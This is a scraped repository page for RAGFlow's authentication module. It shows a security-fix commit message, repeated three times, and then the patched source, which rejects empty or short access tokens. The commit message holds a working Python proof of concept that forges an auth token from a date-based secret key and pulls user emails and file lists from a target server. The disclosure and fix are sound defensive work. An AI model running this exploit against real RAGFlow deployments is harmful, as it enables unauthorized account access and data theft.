You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

__init__.py 5.4KB

Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180
  1. #
  2. # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
  3. #
  4. # Licensed under the Apache License, Version 2.0 (the "License");
  5. # you may not use this file except in compliance with the License.
  6. # You may obtain a copy of the License at
  7. #
  8. # http://www.apache.org/licenses/LICENSE-2.0
  9. #
  10. # Unless required by applicable law or agreed to in writing, software
  11. # distributed under the License is distributed on an "AS IS" BASIS,
  12. # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13. # See the License for the specific language governing permissions and
  14. # limitations under the License.
  15. #
  16. import os
  17. import sys
  18. import logging
  19. from importlib.util import module_from_spec, spec_from_file_location
  20. from pathlib import Path
  21. from flask import Blueprint, Flask
  22. from werkzeug.wrappers.request import Request
  23. from flask_cors import CORS
  24. from flasgger import Swagger
  25. from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer
  26. from api.db import StatusEnum
  27. from api.db.db_models import close_connection
  28. from api.db.services import UserService
  29. from api.utils import CustomJSONEncoder, commands
  30. from flask_mail import Mail
  31. from flask_session import Session
  32. from flask_login import LoginManager
  33. from api import settings
  34. from api.utils.api_utils import server_error_response
  35. from api.constants import API_VERSION
  36. __all__ = ["app"]
  37. Request.json = property(lambda self: self.get_json(force=True, silent=True))
  38. app = Flask(__name__)
  39. smtp_mail_server = Mail()
  40. # Add this at the beginning of your file to configure Swagger UI
  41. swagger_config = {
  42. "headers": [],
  43. "specs": [
  44. {
  45. "endpoint": "apispec",
  46. "route": "/apispec.json",
  47. "rule_filter": lambda rule: True, # Include all endpoints
  48. "model_filter": lambda tag: True, # Include all models
  49. }
  50. ],
  51. "static_url_path": "/flasgger_static",
  52. "swagger_ui": True,
  53. "specs_route": "/apidocs/",
  54. }
  55. swagger = Swagger(
  56. app,
  57. config=swagger_config,
  58. template={
  59. "swagger": "2.0",
  60. "info": {
  61. "title": "RAGFlow API",
  62. "description": "",
  63. "version": "1.0.0",
  64. },
  65. "securityDefinitions": {
  66. "ApiKeyAuth": {"type": "apiKey", "name": "Authorization", "in": "header"}
  67. },
  68. },
  69. )
  70. CORS(app, supports_credentials=True, max_age=2592000)
  71. app.url_map.strict_slashes = False
  72. app.json_encoder = CustomJSONEncoder
  73. app.errorhandler(Exception)(server_error_response)
  74. ## convince for dev and debug
  75. # app.config["LOGIN_DISABLED"] = True
  76. app.config["SESSION_PERMANENT"] = False
  77. app.config["SESSION_TYPE"] = "filesystem"
  78. app.config["MAX_CONTENT_LENGTH"] = int(
  79. os.environ.get("MAX_CONTENT_LENGTH", 1024 * 1024 * 1024)
  80. )
  81. Session(app)
  82. login_manager = LoginManager()
  83. login_manager.init_app(app)
  84. commands.register_commands(app)
  85. def search_pages_path(pages_dir):
  86. app_path_list = [
  87. path for path in pages_dir.glob("*_app.py") if not path.name.startswith(".")
  88. ]
  89. api_path_list = [
  90. path for path in pages_dir.glob("*sdk/*.py") if not path.name.startswith(".")
  91. ]
  92. app_path_list.extend(api_path_list)
  93. return app_path_list
  94. def register_page(page_path):
  95. path = f"{page_path}"
  96. page_name = page_path.stem.removesuffix("_app")
  97. module_name = ".".join(
  98. page_path.parts[page_path.parts.index("api"): -1] + (page_name,)
  99. )
  100. spec = spec_from_file_location(module_name, page_path)
  101. page = module_from_spec(spec)
  102. page.app = app
  103. page.manager = Blueprint(page_name, module_name)
  104. sys.modules[module_name] = page
  105. spec.loader.exec_module(page)
  106. page_name = getattr(page, "page_name", page_name)
  107. sdk_path = "\\sdk\\" if sys.platform.startswith("win") else "/sdk/"
  108. url_prefix = (
  109. f"/api/{API_VERSION}" if sdk_path in path else f"/{API_VERSION}/{page_name}"
  110. )
  111. app.register_blueprint(page.manager, url_prefix=url_prefix)
  112. return url_prefix
  113. pages_dir = [
  114. Path(__file__).parent,
  115. Path(__file__).parent.parent / "api" / "apps",
  116. Path(__file__).parent.parent / "api" / "apps" / "sdk",
  117. ]
  118. client_urls_prefix = [
  119. register_page(path) for dir in pages_dir for path in search_pages_path(dir)
  120. ]
  121. @login_manager.request_loader
  122. def load_user(web_request):
  123. jwt = Serializer(secret_key=settings.SECRET_KEY)
  124. authorization = web_request.headers.get("Authorization")
  125. if authorization:
  126. try:
  127. access_token = str(jwt.loads(authorization))
  128. if not access_token or not access_token.strip():
  129. logging.warning("Authentication attempt with empty access token")
  130. return None
  131. # Access tokens should be UUIDs (32 hex characters)
  132. if len(access_token.strip()) < 32:
  133. logging.warning(f"Authentication attempt with invalid token format: {len(access_token)} chars")
  134. return None
  135. user = UserService.query(
  136. access_token=access_token, status=StatusEnum.VALID.value
  137. )
  138. if user:
  139. if not user[0].access_token or not user[0].access_token.strip():
  140. logging.warning(f"User {user[0].email} has empty access_token in database")
  141. return None
  142. return user[0]
  143. else:
  144. return None
  145. except Exception as e:
  146. logging.warning(f"load_user got exception {e}")
  147. return None
  148. else:
  149. return None
  150. @app.teardown_request
  151. def _db_close(exc):
  152. close_connection()